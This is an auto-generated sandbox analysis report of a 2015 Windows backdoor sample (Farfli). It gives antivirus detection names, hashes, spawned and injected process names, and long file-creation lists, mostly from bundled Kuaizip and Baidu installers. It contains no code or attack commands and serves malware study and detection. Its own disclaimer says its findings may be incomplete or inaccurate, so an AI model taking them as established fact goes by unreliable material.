Backdoor.Win32.Farfli_1bece0d3d9

by malwarelabrobot on October 15th, 2015 in Malware Descriptions.

HEUR:Trojan-Downloader.Win32.Generic (Kaspersky), Gen:Variant.Symmi.48377 (B) (Emsisoft), Backdoor.Win32.Farfli.FD, Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR, BankerGeneric.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan-PSW, Banker, Trojan, Backdoor, Worm, EmailWorm


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 1bece0d3d969ebaf167b88f355e5187b
SHA1: accb642bd939290b252f194a094f7f77c0e4f3be
SHA256: cfcfa8ab5ac7fcf97a32266818405544b0e22aba99df7f6f86e87e6cc4a33fd7
SSDeep: 12288:045G/8caG0QS ticOX9gUAI1G4u8axQDHjArtDhp0A3M:04EaGZSmOOUAkI8acjGDhzM
Size: 566096 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: StdLib
Created at: 2015-10-01 04:51:53
Analyzed on: WindowsXP SP3 32-bit


Summary:

Backdoor. Malware that enables a remote control of victim's machine.

Payload

Behaviour Description
EmailWorm Worm can send e-mails.


Process activity

The Backdoor creates the following process(es):

Kuaizip_Setup_7654_1061607.exe:1100
Baidu_Setup_1.6.200.359_ftn_1050103060.exe:572
Baidu_Setup_1.6.200.359_ftn_1050103060.exe:3100
bcservice.exe:2752
KZReport.exe:1836
9158IE.exe:3432
9158IE.exe:2864
YouQian_Setup.exe:2228
KuaiZip.exe:1140
Update.exe:1948
Update.exe:608
Baidu.exe:3808
Baidu.exe:2720
Baidu.exe:4000
Baidu.exe:4016
Baidu.exe:3800
KZMount.exe:1976
KZMount.exe:1772
9158.exe:3180
BugReport.exe:3376
BugReport.exe:3248
regsvr32.exe:1700
regsvr32.exe:2620
regsvr32.exe:2520
regsvr32.exe:2444
regsvr32.exe:596
regsvr32.exe:2652
regsvr32.exe:1364
regsvr32.exe:800
CheckerExe.exe:1644
9158chat2_ktv097_28.exe:2072
at.exe:1868
at.exe:1880

The Backdoor injects its code into the following process(es):

DownLoad.exe:3484
%original file name%.exe:1832
MM-liao9728.exe:1888
Baidu.exe:324

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process Kuaizip_Setup_7654_1061607.exe:1100 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Program Files%\¿ìѹ\data\slimdata.dat (784 bytes)
%Program Files%\¿ìѹ\ErrorMsg.xml (196 bytes)
%Program Files%\¿ìѹ\readme.txt (1 bytes)
%Program Files%\¿ìѹ\X86\KZReport.exe (5232 bytes)
%Program Files%\¿ìѹ\X86\Uninst.exe (8122 bytes)
%Program Files%\¿ìѹ\7zNew.dat (32 bytes)
%Program Files%\¿ìѹ\X86\SetupHelper.exe (667 bytes)
%Program Files%\¿ìѹ\X86\Update.exe (393 bytes)
%Program Files%\¿ìѹ\X86\sfx\kzSetup_chs.sfx (3557 bytes)
%Program Files%\¿ìѹ\SLDefault.xml (196 bytes)
%Program Files%\¿ìѹ\X86\KZModule.dll (6582 bytes)
%Program Files%\¿ìѹ\X86\KZipShell.dll (981 bytes)
%Program Files%\¿ìѹ\ali\kzshop.ico (1686 bytes)
%Program Files%\¿ìѹ\X86\KZMount.exe (2890 bytes)
%Program Files%\¿ìѹ\X86\7z.dll (7131 bytes)
%Documents and Settings%\%current user%\Desktop\¿ìѹ.lnk (661 bytes)
%Program Files%\¿ìѹ\X86\KZFormat.dll (2028 bytes)
%Program Files%\¿ìѹ\X86\BSCoreNew.dll (4135 bytes)
%Program Files%\¿ìѹ\X86\Mount.dll (1490 bytes)
%Program Files%\¿ìѹ\X86\finderlib.dll (314 bytes)
%Program Files%\¿ìѹ\X86\kuaizipUpdateChecker.dll (981 bytes)
%Program Files%\¿ìѹ\KzNew.dat (74 bytes)
%Program Files%\¿ìѹ\ZipNew.dat (22 bytes)
%Program Files%\¿ìѹ\X86\MountCore.dll (863 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\my7zData.7z (30622 bytes)
%Program Files%\¿ìѹ\__-________.URL (49 bytes)
%Program Files%\¿ìѹ\X86\KuaiZip.exe (9092 bytes)
%Program Files%\¿ìѹ\X86\DiskOpt.exe (4605 bytes)
%Documents and Settings%\%current user%\Start Menu\¿ìѹ.lnk (661 bytes)
%Program Files%\¿ìѹ\X86\KuaiZipDrive.sys (1137 bytes)
%Program Files%\¿ìѹ\X86\DuiLib.dll (4605 bytes)
%Program Files%\¿ìѹ\ali\jp.png (392 bytes)
%Program Files%\¿ìѹ\X86\lang\Chs_Lang.dll (824 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\my7zData.7z (0 bytes)

The process Baidu_Setup_1.6.200.359_ftn_1050103060.exe:572 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp\InstallHelper.dll (26688 bytes)
%WinDir%\Temp\baidu\youqian\桌面百度\YouQian_Setup.exe (25112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp (284894 bytes)
%WinDir%\Temp\baidu\youqian\桌面百度\桌面百度.ini (1607 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%WinDir%\Temp\baidu\youqian\桌面百度\process.cfg (210 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%WinDir%\Temp\baidu\youqian\桌面百度\132.exe (172202 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp\BDMSkin.dll (37727 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk1.tmp (0 bytes)

The process Baidu_Setup_1.6.200.359_ftn_1050103060.exe:3100 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-checkbox-unchecked.png (361 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{2A53DBDC-6363-4742-8166-C38D1E5A4CF6}\Microsoft.VC80.CRT\msvcp80.dll (3361 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\bg-circle-loading.png (6 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\x64\bd0001.sys (181 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\data\apps.db (5627 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\executor.xml (233 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\error-pages_x.png (89 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\png8-logo57x65.png (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Protocol.dll (24048 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\PluginSetup.xml (654 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\res_yinyue.png (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\sleet.png (741 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\request.js (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\error-pages_z.png (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\crash.html (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\shower.png (817 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{48A02D42-CF48-4601-9126-5F90C2D01273}\Microsoft.VC80.CRT\microsoft.vc80.crt.manifest (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\mod.js (1 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{2A53DBDC-6363-4742-8166-C38D1E5A4CF6}\Microsoft.VC80.CRT\microsoft.vc80.crt.manifest (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\green_arrow_up.png (154 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\vedio_play.png (465 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\connection-error.html (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\AssociateWnd.rdb (1568 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\aladdin.html (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\light-snow.png (918 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\testIO.exe (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-button-search-large.png (408 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\bianqianUI.xml (346 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-button-search.png (382 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\moderate-rain.png (963 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\skinres.rdb (1856 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{48A02D42-CF48-4601-9126-5F90C2D01273}\Microsoft.VC80.ATL\atl80.dll (601 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\download.png (991 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{176966FA-0615-4A30-8CE0-1018EEFED0D2}\Microsoft.VC80.CRT\microsoft.vc80.crt.manifest (1 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{176966FA-0615-4A30-8CE0-1018EEFED0D2}\Microsoft.VC80.CRT\msvcm80.dll (3073 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\xinwenUI.xml (342 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\icon-alert-ok.png (2392 bytes)
%System%\drivers\BDCEnhance.sys (673 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\gray1px.png (918 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{029F24D8-7145-43A0-A519-1F4D8E37D4AD}\Microsoft.VC80.CRT\msvcp80.dll (3361 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BrowserCore.dll (67072 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\res_bianqian.png (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\thundershower-with-hail.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\json2.js (2 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{324C03EF-41AC-49C7-88CE-720C670629E2}\Microsoft.VC80.CRT\microsoft.vc80.crt.manifest (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-center-left.png (130 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{5F68585C-AF28-4793-9360-66E51B87947C}\Microsoft.VC80.CRT\msvcp80.dll (3361 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\snow-storm.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\PluginSetup.xml (616 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\general.png (379 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\light-snow.png (1 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{176966FA-0615-4A30-8CE0-1018EEFED0D2}\Microsoft.VC80.CRT\msvcp80.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc9.tmp\Base.dll (38904 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\arrow-png8.png (260 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\red_arrow_down.png (944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc9.tmp\msvcp100.dll (14184 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\366.png (5 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\x64\bduniptk.sys (291 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-searchbox-active.png (893 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{48A02D42-CF48-4601-9126-5F90C2D01273}\Microsoft.VC80.CRT\msvcm80.dll (3073 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\ice-rain.png (784 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{324C03EF-41AC-49C7-88CE-720C670629E2}\Microsoft.VC80.CRT\msvcr80.dll (4185 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\res_weixin.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\green_arrow_down.png (944 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\red_arrow_down.png (150 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\44.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\error-pages.css (7 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\data\10000302.dat (904 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\qxdh20140619.png (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\cloudy.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\363.png (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\red_arrow_up.png (943 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-button-new.png (977 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\PWidgetAppCommonBase.dll (14384 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\app-reload.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-button.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-searchbox.png (893 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\server-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\snow-flurry.png (847 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\storm.png (815 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mb_setup.log (2587 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\AppHTMLXinWen.xml (442 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\music_play.png (960 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\GlobalPluginInfo.xml (6 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\jquery.color-2.1.2.min.js (6 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\atl100.dll (10128 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\icon_xiaoxizhongxin.png (1 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{2A53DBDC-6363-4742-8166-C38D1E5A4CF6}\Microsoft.VC80.CRT\msvcm80.dll (3073 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\bookmarks_mods.js (1856 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\yinyueUI.xml (358 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{5F68585C-AF28-4793-9360-66E51B87947C}\BDArUtils.dll (68 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\download.png (177 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\red_arrow_up.png (154 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\skinres.rdb (1856 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\icon_resou.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\severe-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\overcast.png (680 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\ala.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\res_gupiao.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\ssl-error.html (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\png8-login-success.png (824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\bdzc_Setup_2.0.3.124[1].dll (90365 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\arrow.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\haze.png (1 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\bd0001.sys (601 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\PluginMgr.dll (49664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc9.tmp\Protocol.dll (12024 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\uninst.exe (18640 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-center-right.png (130 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\app-error.html (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\bookmarks_z.png (7 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{48A02D42-CF48-4601-9126-5F90C2D01273}\IPC.dll (86 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc9.tmp\BDMSkin.dll (30464 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\se\icon-google.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\dy.png (1 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{48A02D42-CF48-4601-9126-5F90C2D01273}\Microsoft.VC80.CRT\msvcr80.dll (4185 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\advance.png (377 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\PluginSetup.xml (616 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\bduniptk.sys (1425 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{48A02D42-CF48-4601-9126-5F90C2D01273}\Microsoft.VC80.CRT\msvcp80.dll (3361 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\folder.png (276 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{2A53DBDC-6363-4742-8166-C38D1E5A4CF6}\Microsoft.VC80.ATL\atl80.dll (601 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\jietuDll.dll (3312 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\x64\BDArKit.sys (151 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\auto_complete\top_site.db (10128 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\heavy-snow.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc9.tmp\BDWebDownload.dll (7192 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\jietuUI.xml (347 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\Update.rdb (6624 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\layout.css (11 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\severe-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\DD_belatedPNG_0.0.8a-min.js (6 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\microsoft.vc80.crt\msvcm80.dll (1760 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\icon_yinyue.png (1 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{029F24D8-7145-43A0-A519-1F4D8E37D4AD}\Microsoft.VC80.CRT\microsoft.vc80.crt.manifest (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\super-ajax.js (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\box-shadow.css (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\res_resou.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc9.tmp\System.dll (784 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\dl.dll (6433 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\server-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-textbox.png (588 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\png8-ex.png (1 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{2A53DBDC-6363-4742-8166-C38D1E5A4CF6}\bdxcore.dll (3684 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\history.css (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\login-success.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\png8-iconall-1.png (197 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\gz.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\1px.png (947 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\music_play.png (155 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\loading.png (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sunny.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sc_tmp.dll.bdtmp (90365 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc9.tmp\InstallHelper.dll (3616 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\AppHTMLGuPiao.xml (440 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\download-hover.png (177 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{2A53DBDC-6363-4742-8166-C38D1E5A4CF6}\Microsoft.VC80.CRT\msvcr80.dll (4185 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\login_z.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\icon_xinwen.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\appBlackList.dat (8 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\green_arrow_down.png (150 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\cloudy.png (1 bytes)
